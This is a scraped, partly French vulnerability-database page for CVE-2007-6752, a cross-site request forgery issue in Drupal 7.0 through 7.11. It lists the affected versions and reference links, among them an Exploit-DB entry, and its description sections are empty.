Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.1

Drupal>>Drupal >> Version 7.1 (Open CPE detail)

Drupal>>Drupal >> Version 7.2

Drupal>>Drupal >> Version 7.2 (Open CPE detail)

Drupal>>Drupal >> Version 7.3

Drupal>>Drupal >> Version 7.3 (Open CPE detail)

Drupal>>Drupal >> Version 7.4

Drupal>>Drupal >> Version 7.4 (Open CPE detail)

Drupal>>Drupal >> Version 7.5

Drupal>>Drupal >> Version 7.5 (Open CPE detail)

Drupal>>Drupal >> Version 7.6

Drupal>>Drupal >> Version 7.6 (Open CPE detail)

Drupal>>Drupal >> Version 7.7

Drupal>>Drupal >> Version 7.7 (Open CPE detail)

Drupal>>Drupal >> Version 7.8

Drupal>>Drupal >> Version 7.8 (Open CPE detail)

Drupal>>Drupal >> Version 7.9

Drupal>>Drupal >> Version 7.9 (Open CPE detail)

Drupal>>Drupal >> Version 7.10

Drupal>>Drupal >> Version 7.10 (Open CPE detail)

Drupal>>Drupal >> Version 7.11

Drupal>>Drupal >> Version 7.11 (Open CPE detail)

Drupal>>Drupal >> Version 7.x-dev

Drupal>>Drupal >> Version 7.x-dev (Open CPE detail)

Références

http://ivanobinetti.blogspot.it/2012/03/drupal-cms-712-latest-stable-release.html
Tags : x_refsource_MISC

http://groups.drupal.org/node/216314
Tags : x_refsource_MISC

http://drupal.org/node/144538
Tags : x_refsource_MISC

http://www.exploit-db.com/exploits/18564/
Tags : exploit, x_refsource_EXPLOIT-DB

http://packetstormsecurity.org/files/110404/drupal712-xsrf.txt
Tags : x_refsource_MISC

CVE-2007-6752 : Détail

CVE-2007-6752

Descriptions du CVE

Informations du CVE

Faiblesses connexes

Métriques

EPSS

Score EPSS

Percentile EPSS

Informations sur l'Exploit

Exploit Database EDB-ID : 18564

Products Mentioned

Configuraton 0

Références